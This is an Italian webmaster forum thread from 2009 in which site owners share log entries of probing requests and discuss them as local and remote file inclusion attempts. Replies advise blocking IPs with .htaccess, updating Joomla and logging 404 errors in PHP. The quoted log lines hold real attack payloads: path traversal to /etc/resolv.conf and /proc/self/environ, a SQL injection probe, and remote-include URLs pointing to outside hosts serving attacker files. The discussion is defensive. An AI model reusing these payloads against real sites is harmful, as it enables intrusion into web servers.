Visualizzazione risultati 1 fino 17 di 17

Discussione: Strane richieste da un IP

  1. #1
    L'avatar di andreafallico
    andreafallico non è connesso Super Moderatore
    Data registrazione
    02-06-2009
    Messaggi
    1,981

    Predefinito Strane richieste da un IP

    Oggi da questo IP 69.16.239.36 (host.futuregrid.net) ricevo strani request_uri, cioè

    miapagina.php/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf

    quello in rosso è la parte in più; secondo voi cosa può essere?

    anche errori 404 -> /test.php?page=./../../../../../../../../../../../../../../../../etc/resolv.conf
    Ultima modifica di andreafallico : 19-12-2009 alle ore 19.43.52

  2. #2
    Guest

    Predefinito

    Un tentativo maldestro di sfruttare register_globals per fare danni, ma non credo che sia andato a buon fine. Ti consiglio di bannare quell'IP dal tuo sito.

  3. #3
    Guest

    Predefinito

    Un tentativo di hacking è sicuro. Io ti consiglierei di stare attento se usi joomla, aggiorna tutto all'ultima versione ...ciao!!

  4. #4
    L'avatar di andreafallico
    andreafallico non è connesso Super Moderatore
    Data registrazione
    02-06-2009
    Messaggi
    1,981

    Predefinito

    Non so più che fare mi sta riempiendo i log degli errori e d'accesso.

  5. #5
    L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Io ricevo da sempre errori simili :P
    Probabilmente sono spam-bot che scansionano i siti per tentare un "attacco" e quindi riempire il sito/forum di schifezze.
    Comunque sembra essere un buon segno (evidentemente il tuo sito cresce :P)
    Solo poche ore:
    Codice:
    Utente  Visitatore - Ieri alle 22:02:17
    indirizzo IP 196.40.83.71
    URL ****altervista.org/index.php?action=error;code=404
    Error 404 - Not Found (****altervista.org//login.php?dir=http://musicadelibreria.net/footer??)
    File: user
    
    Utente Visitatore - Ieri alle 22:02:16
    indirizzo IP 196.40.83.71
    URL ****altervista.org/index.php?action=error;code=404
    Error 404 - Not Found (****altervista.org/phpinfo//login.php?dir=http://musicadelibreria.net/footer??)
    File: user
    
    Utente Visitatore - Ieri alle 22:01:26
    indirizzo IP 196.40.83.71
    URL ****altervista.org/index.php?action=error;code=404
    Error 404 - Not Found (****altervista.org/phpinfo//login.php?dir=http://musicadelibreria.net/footer??)
    File: user
    
    Utente  Visitatore - Ieri alle 23:07:07
    indirizzo IP 206.168.219.110
    URL ****altervista.org/index.php?action=error;code=404
    Error 404 - Not Found (****altervista.org/phpinfo/%22%20class=77+and(select+count(*)+from+Pablin77)--)
    File: user
    
    Utente Visitatore - Ieri alle 23:04:27
    indirizzo IP 212.235.107.17
    URL ****altervista.org/index.php?action=error;code=404
    Error 404 - Not Found (****altervista.org/antivirus-and-sicurezza/avira-antivir-7/%2B%255bPLM=0%255d%255bR%255d%2BGET%2Bhttp:/****.altervista.org/forum/register/%2B%255b0,36023,1591%255d%2B-%253e%2B%255bR%255d%2BPOST%2Bhttp:/****.altervista.org/forum/register2/%2B%255b0,0,30406%255d%2B-%253e%2B%255bL%255d%2BGET%2Bhttp:/****.altervista.org/forum/login/%2B%255b0,18883,31846%255d%2B-%253e%2B%255bL%255d%2BPOST%2Bhttp:/****.altervista.org/forum/login2/%2B%255b0,0,21054%255d%2B-%253e%2B%255bN%255d%2BGET%2Bhttp:/****.altervista.org/forum/antivirus-and-sicurezza/avira-antivir-7/%2B%255b0,122236,134222%255d%2B-%253e%2B%255bN%255d%2BPOST%2Bhttp:/****.altervista.org/forum/antivirus-and-sicurezza/avira-antivir-7/?action=quickmod2%2B%25255BR=302%25255D%25255B11927,0,302%25255D)
    File: user
    
    Utente Visitatore - Ieri alle 22:13:59
    indirizzo IP 217.171.66.245
    URL ****altervista.org/index.php?action=error;code=404
    Error 404 - Not Found (****altervista.org/tpmod/index.php?pagina=../../../../../../../../../../../../../proc/self/environ%00)
    File: user
    
    Utente  Visitatore - Oggi alle 00:42:23
    indirizzo IP 76.73.36.114
    URL ****altervista.org/index.php?action=error;code=404
    Error 404 - Not Found (****altervista.org/board.php?see=./../../../../../../../../../../../../../../../../etc/resolv.conf)
    File: user
    
    Utente Visitatore - Oggi alle 00:42:23
    indirizzo IP 76.73.36.114
    URL ****altervista.org/index.php?action=error;code=404
    Error 404 - Not Found (****altervista.org/robots.txt/board.php?see=./../../../../../../../../../../../../../../../../etc/resolv.conf)
    File: user
    
    Utente Visitatore - Oggi alle 00:42:21
    indirizzo IP 76.73.36.114
    URL ****altervista.org/index.php?action=error;code=404
    Error 404 - Not Found (****altervista.org/board.php?see=./../../../../../../../../../../../../../../../../etc/resolv.conf%00)
    File: user
    
    Utente Visitatore - Oggi alle 00:42:21
    indirizzo IP 76.73.36.114
    URL ****altervista.org/index.php?action=error;code=404
    Error 404 - Not Found (****altervista.org/robots.txt/board.php?see=./../../../../../../../../../../../../../../../../etc/resolv.conf%00)
    File: user
    Ultima modifica di darkwolf : 20-12-2009 alle ore 02.26.30

  6. #6
    Guest

    Predefinito

    Un tentativo di LFI

  7. #7
    Guest

    Predefinito

    Scusate, come si fanno a vedere questi tentativi di accesso?

  8. #8
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,745

    Predefinito

    Era già capitato qui sul forum queste segnalazioni, ma a cosa sevono? Cioè se vanno alle cartelle superiori, cosa sperano di fare??...e poi tanto sono bloccate perché non si può accedere oltre!

    Non capisco il senso di questi attacchi... Cosa contiene quel file che tentano di aprire? Esiste?

  9. #9
    L'avatar di saitfainder
    saitfainder non è connesso Sëniör Stäff
    Data registrazione
    06-12-2002
    Residenza
    Torino
    Messaggi
    8,715

    Predefinito

    Citazione Originalmente inviato da alemoppo Visualizza messaggio
    Non capisco il senso di questi attacchi... Cosa contiene quel file che tentano di aprire? Esiste?
    /etc/resolv.conf contiene i server DNS utilizzati dalla macchina. Un file innoquo preso di mira penso solo per testare l'attaccabilità del server.

    Volendo potete bloccare utenti con determinati indirizzi IP via htaccess:

    Codice:
    order allow,deny
    allow from all
    deny from xxx.xxx.xxx.xxx


    «È una mia peculiarità distorcere la verità e inventarne di nuove.»
    «I tuoi orientamenti hanno su di me un effetto prossimo allo zero.»


  10. #10
    Guest

    Predefinito

    alemoppo, alcuni sono tentativi di LFI (Local File Inclusion), altri di RFI (Remote File Inclusion) e alcuni tentano ad accedere a file di sistema. La maggior parte delle volte questi tentativi falliscono, ma quando vanno a buon fine possiamo dire che sono cavoli amari per il webmaster. La cosa che non capisco è che senso ha divertirsi a distruggere il lavoro altrui. Tanto anche se inserisci 10.000 link al tuo sito nelle mie pagine tutti penseranno che sei comunque un imbecille, quindi non vedo che cambia. Mah...

  11. #11
    L'avatar di andreafallico
    andreafallico non è connesso Super Moderatore
    Data registrazione
    02-06-2009
    Messaggi
    1,981

    Predefinito

    Quasi ogni giorno tentano:
    85.17.199.105 - shared03.neostradainfra.nl - 22 December 2009 00:20:58 - - HTTP/1.1 404 Not Found GET - /locateIp.php//?_SERVER[DOCUMENT_ROOT]=http://www.gastatedar.org/mambo/zfxid1.txt??? - Array() - Mozilla/5.0

  12. #12
    Guest

    Predefinito

    In che senso "nella maggiorparte delle volte non vanno"?
    Cioè dipende dai casi? Oppure serve una protezione per il sito per evitare che succeda?
    Come posso creare dei log degli accessi e monitorare eventualmente anche questo tipo di attacchi?
    Mi appresto a fare un sito serio (che spero riuscirò a mantenere) e vorrei sapere tutto sulla sicurezza.

  13. #13
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,745

    Predefinito

    Citazione Originalmente inviato da genuzzu Visualizza messaggio
    In che senso "nella maggiorparte delle volte non vanno"?
    Cioè dipende dai casi? Oppure serve una protezione per il sito per evitare che succeda?
    Come posso creare dei log degli accessi e monitorare eventualmente anche questo tipo di attacchi?
    Mi appresto a fare un sito serio (che spero riuscirò a mantenere) e vorrei sapere tutto sulla sicurezza.
    ...Comunque sia, hai detto che vuoi fare un sito serio, ma sappi che non esiste un modo per essere protetti alla perfezione: ci sarà sempre un limite di protezione ad un sito o qualsiasi cosa non potrà essere protetto "in assoluto".

    Comunque, puoi fare come dice saitfander...ovvero bloccare gli IP che fanno tali tentativi...

  14. #14
    Guest

    Predefinito

    genuzzu, nella maggior parte dei casi non funzionano perché quei bot vanno "a tentativi". Controllano che sul tuo spazio FTP ci sia qualche file infetto e tentano di eseguirlo, ma non lo trovano. Poi provano a sfruttare qualche vulnerabilità nel tuo CMS per vedere se va a buon fine, ma molte volte non succede. Anche se è raro un attacco andato a buon fine, è un fattore sempre da tenere in considerazione!

  15. #15
    Guest

    Predefinito

    Succede anche a me che qualcuno provi ad attaccare il sito o il server, ma non ci do mai tanto peso. Ti consiglio, se è sempre lo stesso IP che ti attacca, di bloccarlo in qualche modo come già suggerito. Ciao!

  16. #16
    Guest

    Predefinito

    Ma come faccio a monitorare le richieste?

  17. #17
    L'avatar di mycarlo
    mycarlo non è connesso Utente attivo
    Data registrazione
    06-10-2009
    Residenza
    $this->s50
    Messaggi
    467

    Predefinito

    Con php, quando si raggiunge la pagina di errore con php salvi alcune informazioni (io le salvo in un file txt).

    Ad esempio:
    Codice PHP:
    file_put_contents("404_log.txt", "{$_SERVER["REMOTE_ADDR"]} | {$_SERVER["REQUEST_URI"]} | {$_SERVER["HTTP_USER_AGENT"]}\n", FILE_APPEND | LOCK_EX);

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •